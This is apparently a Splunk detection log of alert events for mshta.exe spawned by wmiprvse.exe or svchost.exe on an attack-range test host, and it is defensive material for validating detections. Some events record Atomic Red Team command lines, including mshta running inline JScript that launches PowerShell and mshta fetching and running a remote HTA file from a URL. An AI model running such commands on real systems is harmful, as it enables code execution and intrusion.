1657741634, search_name="ESCU - Suspicious mshta spawn - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious MSHTA Activity", annotations="{\"analytic_story\": [\"Suspicious MSHTA Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 60, \"context\": [\"Source:Endpoint\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1218\", \"T1218.005\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Suspicious MSHTA Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.005", annotations.nist="PR.PT", annotations.nist="DE.CM", count="75", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:36", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:38:04", original_file_name="unknown", parent_process="unknown", process="unknown", process_name="mshta.exe", risk_message="mshta.exe spawned by wmiprvse.exe on win-host-mhaag-attack-range-117", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="42.0", savedsearch_description="The following analytic identifies wmiprvse.exe spawning mshta.exe. This behavior is indicative of a DCOM object being utilized to spawn mshta from wmiprvse.exe or svchost.exe. In this instance, adversaries may use LethalHTA that will spawn mshta.exe from svchost.exe.", user="unknown"
1657741634, search_name="ESCU - Suspicious mshta spawn - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious MSHTA Activity", annotations="{\"analytic_story\": [\"Suspicious MSHTA Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 60, \"context\": [\"Source:Endpoint\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1218\", \"T1218.005\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Suspicious MSHTA Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.005", annotations.nist="PR.PT", annotations.nist="DE.CM", count="3", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:52", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:32:00", original_file_name="MSHTA.EXE", parent_process="C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding", process="\"C:\\Windows\\system32\\mshta.exe\" \"\\\\WIN-HOST-MHAAG-\\C$\\Users\\Administrator\\AppData\\Local\\Temp\\2\\Test.hta\"", process="\"C:\\Windows\\system32\\mshta.exe\" \"about:&lt;hta:application&gt;&lt;script language=\"JScript\"&gt;a=new%%20ActiveXObject(\"WScript.Shell\");a.Run(\"powershell.exe%%20-nop%%20-Command%%20Write-Host%%2023aa97c3-2d1e-46ec-a7aa-b62426241201;%%20Start-Sleep%%20-Seconds%%202;%%20exit\",0,true);close();&lt;/script&gt;'\"", process="\"C:\\Windows\\system32\\mshta.exe\" \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/24549e3866407c3080b95b6afebf78e8acd23352/atomics/T1218.005/src/T1218.005.hta\"", process_name="mshta.exe", risk_message="mshta.exe spawned by wmiprvse.exe on win-host-mhaag-attack-range-117", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="42.0", savedsearch_description="The following analytic identifies wmiprvse.exe spawning mshta.exe. This behavior is indicative of a DCOM object being utilized to spawn mshta from wmiprvse.exe or svchost.exe. In this instance, adversaries may use LethalHTA that will spawn mshta.exe from svchost.exe.", user="Administrator"
1657741634, search_name="ESCU - Suspicious mshta spawn - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious MSHTA Activity", annotations="{\"analytic_story\": [\"Suspicious MSHTA Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 60, \"context\": [\"Source:Endpoint\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1218\", \"T1218.005\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Suspicious MSHTA Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.005", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:43", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:31:43", original_file_name="MSHTA.EXE", parent_process="C:\\Windows\\system32\\svchost.exe -k DcomLaunch", process="C:\\Windows\\System32\\mshta.exe -Embedding", process_name="mshta.exe", risk_message="mshta.exe spawned by wmiprvse.exe on win-host-mhaag-attack-range-117", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="42.0", savedsearch_description="The following analytic identifies wmiprvse.exe spawning mshta.exe. This behavior is indicative of a DCOM object being utilized to spawn mshta from wmiprvse.exe or svchost.exe. In this instance, adversaries may use LethalHTA that will spawn mshta.exe from svchost.exe.", user="Administrator"
1657741634, search_name="ESCU - Suspicious mshta spawn - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious MSHTA Activity", annotations="{\"analytic_story\": [\"Suspicious MSHTA Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 60, \"context\": [\"Source:Endpoint\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1218\", \"T1218.005\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Suspicious MSHTA Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.005", annotations.nist="PR.PT", annotations.nist="DE.CM", count="3", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:52", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:32:00", original_file_name="unknown", parent_process="C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", process="\"C:\\Windows\\system32\\mshta.exe\" \"\\\\WIN-HOST-MHAAG-\\C$\\Users\\Administrator\\AppData\\Local\\Temp\\2\\Test.hta\"", process="\"C:\\Windows\\system32\\mshta.exe\" \"about:<hta:application><script language=\"JScript\">a=new%20ActiveXObject(\"WScript.Shell\");a.Run(\"powershell.exe%20-nop%20-Command%20Write-Host%2023aa97c3-2d1e-46ec-a7aa-b62426241201;%20Start-Sleep%20-Seconds%202;%20exit\",0,true);close();</script>'\"", process="\"C:\\Windows\\system32\\mshta.exe\" \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/24549e3866407c3080b95b6afebf78e8acd23352/atomics/T1218.005/src/T1218.005.hta\"", process_name="mshta.exe", risk_message="mshta.exe spawned by wmiprvse.exe on win-host-mhaag-attack-range-117", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="42.0", savedsearch_description="The following analytic identifies wmiprvse.exe spawning mshta.exe. This behavior is indicative of a DCOM object being utilized to spawn mshta from wmiprvse.exe or svchost.exe. In this instance, adversaries may use LethalHTA that will spawn mshta.exe from svchost.exe.", user="Administrator"
1657741634, search_name="ESCU - Suspicious mshta spawn - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious MSHTA Activity", annotations="{\"analytic_story\": [\"Suspicious MSHTA Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 60, \"context\": [\"Source:Endpoint\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1218\", \"T1218.005\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Suspicious MSHTA Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.005", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:43", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:31:43", original_file_name="unknown", parent_process="C:\\Windows\\System32\\svchost.exe", process="C:\\Windows\\System32\\mshta.exe -Embedding", process_name="mshta.exe", risk_message="mshta.exe spawned by wmiprvse.exe on win-host-mhaag-attack-range-117", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="42.0", savedsearch_description="The following analytic identifies wmiprvse.exe spawning mshta.exe. This behavior is indicative of a DCOM object being utilized to spawn mshta from wmiprvse.exe or svchost.exe. In this instance, adversaries may use LethalHTA that will spawn mshta.exe from svchost.exe.", user="Administrator"
1657741381, search_name="ESCU - Svchost LOLBAS Execution Process Spawn - Rule", analyticstories="Active Directory Lateral Movement", analyticstories="Living Off The Land", annotations="{\"analytic_story\": [\"Active Directory Lateral Movement\", \"Living Off The Land\"], \"confidence\": 60, \"context\": [\"Source:Endpoint\", \"Stage:Lateral Movement\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1053\", \"T1053.005\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Active Directory Lateral Movement", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Lateral Movement", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1053", annotations.mitre_attack="T1053.005", count="2", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:52", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:31:52", parent_process="unknown", parent_process_id="948", process="unknown", process_id="8080", process_name="mshta.exe", risk_message="Svchost.exe spawned a LOLBAS process on $dest", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="54.0", savedsearch_description="The following analytic identifies `svchost.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the Task Scheduler and creating a malicious remote scheduled task, the executed command is spawned as a child process of `svchost.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of svchost.exe that are part of the LOLBAS project can help defenders identify lateral movement activity.", user="unknown"
1657741381, search_name="ESCU - Svchost LOLBAS Execution Process Spawn - Rule", analyticstories="Active Directory Lateral Movement", analyticstories="Living Off The Land", annotations="{\"analytic_story\": [\"Active Directory Lateral Movement\", \"Living Off The Land\"], \"confidence\": 60, \"context\": [\"Source:Endpoint\", \"Stage:Lateral Movement\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1053\", \"T1053.005\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Active Directory Lateral Movement", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Lateral Movement", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1053", annotations.mitre_attack="T1053.005", count="3", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:38:04", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:38:04", parent_process="unknown", parent_process_id="796", process="unknown", process_id="8080", process_name="mshta.exe", risk_message="Svchost.exe spawned a LOLBAS process on $dest", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="54.0", savedsearch_description="The following analytic identifies `svchost.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the Task Scheduler and creating a malicious remote scheduled task, the executed command is spawned as a child process of `svchost.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of svchost.exe that are part of the LOLBAS project can help defenders identify lateral movement activity.", user="unknown"
1657741381, search_name="ESCU - Svchost LOLBAS Execution Process Spawn - Rule", analyticstories="Active Directory Lateral Movement", analyticstories="Living Off The Land", annotations="{\"analytic_story\": [\"Active Directory Lateral Movement\", \"Living Off The Land\"], \"confidence\": 60, \"context\": [\"Source:Endpoint\", \"Stage:Lateral Movement\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1053\", \"T1053.005\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Active Directory Lateral Movement", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Lateral Movement", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1053", annotations.mitre_attack="T1053.005", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:52", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:31:52", parent_process="unknown", parent_process_id="736", process="unknown", process_id="8080", process_name="mshta.exe", risk_message="Svchost.exe spawned a LOLBAS process on $dest", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="54.0", savedsearch_description="The following analytic identifies `svchost.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the Task Scheduler and creating a malicious remote scheduled task, the executed command is spawned as a child process of `svchost.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of svchost.exe that are part of the LOLBAS project can help defenders identify lateral movement activity.", user="unknown"
1657741381, search_name="ESCU - Svchost LOLBAS Execution Process Spawn - Rule", analyticstories="Active Directory Lateral Movement", analyticstories="Living Off The Land", annotations="{\"analytic_story\": [\"Active Directory Lateral Movement\", \"Living Off The Land\"], \"confidence\": 60, \"context\": [\"Source:Endpoint\", \"Stage:Lateral Movement\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1053\", \"T1053.005\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Active Directory Lateral Movement", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Lateral Movement", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1053", annotations.mitre_attack="T1053.005", count="3", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:52", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:31:52", parent_process="unknown", parent_process_id="1028", process="unknown", process_id="8080", process_name="mshta.exe", risk_message="Svchost.exe spawned a LOLBAS process on $dest", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="54.0", savedsearch_description="The following analytic identifies `svchost.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the Task Scheduler and creating a malicious remote scheduled task, the executed command is spawned as a child process of `svchost.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of svchost.exe that are part of the LOLBAS project can help defenders identify lateral movement activity.", user="unknown"
1657741381, search_name="ESCU - Svchost LOLBAS Execution Process Spawn - Rule", analyticstories="Active Directory Lateral Movement", analyticstories="Living Off The Land", annotations="{\"analytic_story\": [\"Active Directory Lateral Movement\", \"Living Off The Land\"], \"confidence\": 60, \"context\": [\"Source:Endpoint\", \"Stage:Lateral Movement\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1053\", \"T1053.005\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Active Directory Lateral Movement", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Lateral Movement", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1053", annotations.mitre_attack="T1053.005", count="2", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:48", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:31:48", parent_process="unknown", parent_process_id="948", process="unknown", process_id="7888", process_name="mshta.exe", risk_message="Svchost.exe spawned a LOLBAS process on $dest", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="54.0", savedsearch_description="The following analytic identifies `svchost.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the Task Scheduler and creating a malicious remote scheduled task, the executed command is spawned as a child process of `svchost.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of svchost.exe that are part of the LOLBAS project can help defenders identify lateral movement activity.", user="unknown"
1657741381, search_name="ESCU - Svchost LOLBAS Execution Process Spawn - Rule", analyticstories="Active Directory Lateral Movement", analyticstories="Living Off The Land", annotations="{\"analytic_story\": [\"Active Directory Lateral Movement\", \"Living Off The Land\"], \"confidence\": 60, \"context\": [\"Source:Endpoint\", \"Stage:Lateral Movement\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1053\", \"T1053.005\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Active Directory Lateral Movement", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Lateral Movement", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1053", annotations.mitre_attack="T1053.005", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:49", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:31:49", parent_process="unknown", parent_process_id="736", process="unknown", process_id="7888", process_name="mshta.exe", risk_message="Svchost.exe spawned a LOLBAS process on $dest", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="54.0", savedsearch_description="The following analytic identifies `svchost.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the Task Scheduler and creating a malicious remote scheduled task, the executed command is spawned as a child process of `svchost.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of svchost.exe that are part of the LOLBAS project can help defenders identify lateral movement activity.", user="unknown"
1657741381, search_name="ESCU - Svchost LOLBAS Execution Process Spawn - Rule", analyticstories="Active Directory Lateral Movement", analyticstories="Living Off The Land", annotations="{\"analytic_story\": [\"Active Directory Lateral Movement\", \"Living Off The Land\"], \"confidence\": 60, \"context\": [\"Source:Endpoint\", \"Stage:Lateral Movement\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1053\", \"T1053.005\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Active Directory Lateral Movement", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Lateral Movement", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1053", annotations.mitre_attack="T1053.005", count="2", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:36", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:31:36", parent_process="unknown", parent_process_id="948", process="unknown", process_id="6136", process_name="mshta.exe", risk_message="Svchost.exe spawned a LOLBAS process on $dest", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="54.0", savedsearch_description="The following analytic identifies `svchost.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the Task Scheduler and creating a malicious remote scheduled task, the executed command is spawned as a child process of `svchost.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of svchost.exe that are part of the LOLBAS project can help defenders identify lateral movement activity.", user="unknown"
1657741381, search_name="ESCU - Svchost LOLBAS Execution Process Spawn - Rule", analyticstories="Active Directory Lateral Movement", analyticstories="Living Off The Land", annotations="{\"analytic_story\": [\"Active Directory Lateral Movement\", \"Living Off The Land\"], \"confidence\": 60, \"context\": [\"Source:Endpoint\", \"Stage:Lateral Movement\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1053\", \"T1053.005\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Active Directory Lateral Movement", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Lateral Movement", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1053", annotations.mitre_attack="T1053.005", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:36", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:31:36", parent_process="unknown", parent_process_id="736", process="unknown", process_id="6136", process_name="mshta.exe", risk_message="Svchost.exe spawned a LOLBAS process on $dest", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="54.0", savedsearch_description="The following analytic identifies `svchost.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the Task Scheduler and creating a malicious remote scheduled task, the executed command is spawned as a child process of `svchost.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of svchost.exe that are part of the LOLBAS project can help defenders identify lateral movement activity.", user="unknown"
1657741381, search_name="ESCU - Svchost LOLBAS Execution Process Spawn - Rule", analyticstories="Active Directory Lateral Movement", analyticstories="Living Off The Land", annotations="{\"analytic_story\": [\"Active Directory Lateral Movement\", \"Living Off The Land\"], \"confidence\": 60, \"context\": [\"Source:Endpoint\", \"Stage:Lateral Movement\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1053\", \"T1053.005\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Active Directory Lateral Movement", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Lateral Movement", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1053", annotations.mitre_attack="T1053.005", count="3", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:37", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:31:37", parent_process="unknown", parent_process_id="1028", process="unknown", process_id="6136", process_name="mshta.exe", risk_message="Svchost.exe spawned a LOLBAS process on $dest", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="54.0", savedsearch_description="The following analytic identifies `svchost.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the Task Scheduler and creating a malicious remote scheduled task, the executed command is spawned as a child process of `svchost.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of svchost.exe that are part of the LOLBAS project can help defenders identify lateral movement activity.", user="unknown"
1657741381, search_name="ESCU - Svchost LOLBAS Execution Process Spawn - Rule", analyticstories="Active Directory Lateral Movement", analyticstories="Living Off The Land", annotations="{\"analytic_story\": [\"Active Directory Lateral Movement\", \"Living Off The Land\"], \"confidence\": 60, \"context\": [\"Source:Endpoint\", \"Stage:Lateral Movement\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1053\", \"T1053.005\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Active Directory Lateral Movement", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Lateral Movement", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1053", annotations.mitre_attack="T1053.005", count="2", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:40", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:31:40", parent_process="unknown", parent_process_id="948", process="unknown", process_id="5784", process_name="mshta.exe", risk_message="Svchost.exe spawned a LOLBAS process on $dest", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="54.0", savedsearch_description="The following analytic identifies `svchost.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the Task Scheduler and creating a malicious remote scheduled task, the executed command is spawned as a child process of `svchost.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of svchost.exe that are part of the LOLBAS project can help defenders identify lateral movement activity.", user="unknown"
1657741381, search_name="ESCU - Svchost LOLBAS Execution Process Spawn - Rule", analyticstories="Active Directory Lateral Movement", analyticstories="Living Off The Land", annotations="{\"analytic_story\": [\"Active Directory Lateral Movement\", \"Living Off The Land\"], \"confidence\": 60, \"context\": [\"Source:Endpoint\", \"Stage:Lateral Movement\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1053\", \"T1053.005\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Active Directory Lateral Movement", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Lateral Movement", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1053", annotations.mitre_attack="T1053.005", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:41", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:31:41", parent_process="unknown", parent_process_id="736", process="unknown", process_id="5784", process_name="mshta.exe", risk_message="Svchost.exe spawned a LOLBAS process on $dest", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="54.0", savedsearch_description="The following analytic identifies `svchost.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the Task Scheduler and creating a malicious remote scheduled task, the executed command is spawned as a child process of `svchost.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of svchost.exe that are part of the LOLBAS project can help defenders identify lateral movement activity.", user="unknown"
1657741381, search_name="ESCU - Svchost LOLBAS Execution Process Spawn - Rule", analyticstories="Active Directory Lateral Movement", analyticstories="Living Off The Land", annotations="{\"analytic_story\": [\"Active Directory Lateral Movement\", \"Living Off The Land\"], \"confidence\": 60, \"context\": [\"Source:Endpoint\", \"Stage:Lateral Movement\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1053\", \"T1053.005\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Active Directory Lateral Movement", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Lateral Movement", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1053", annotations.mitre_attack="T1053.005", count="3", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:41", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:31:41", parent_process="unknown", parent_process_id="1028", process="unknown", process_id="5784", process_name="mshta.exe", risk_message="Svchost.exe spawned a LOLBAS process on $dest", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="54.0", savedsearch_description="The following analytic identifies `svchost.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the Task Scheduler and creating a malicious remote scheduled task, the executed command is spawned as a child process of `svchost.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of svchost.exe that are part of the LOLBAS project can help defenders identify lateral movement activity.", user="unknown"
1657741381, search_name="ESCU - Svchost LOLBAS Execution Process Spawn - Rule", analyticstories="Active Directory Lateral Movement", analyticstories="Living Off The Land", annotations="{\"analytic_story\": [\"Active Directory Lateral Movement\", \"Living Off The Land\"], \"confidence\": 60, \"context\": [\"Source:Endpoint\", \"Stage:Lateral Movement\"], \"impact\": 90, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1053\", \"T1053.005\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}]}", annotations.analytic_story="Active Directory Lateral Movement", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Lateral Movement", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1053", annotations.mitre_attack="T1053.005", count="2", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:57", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:31:57", parent_process="unknown", parent_process_id="948", process="unknown", process_id="5708", process_name="mshta.exe", risk_message="Svchost.exe spawned a LOLBAS process on $dest", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="54.0", savedsearch_description="The following analytic identifies `svchost.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the Task Scheduler and creating a malicious remote scheduled task, the executed command is spawned as a child process of `svchost.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing 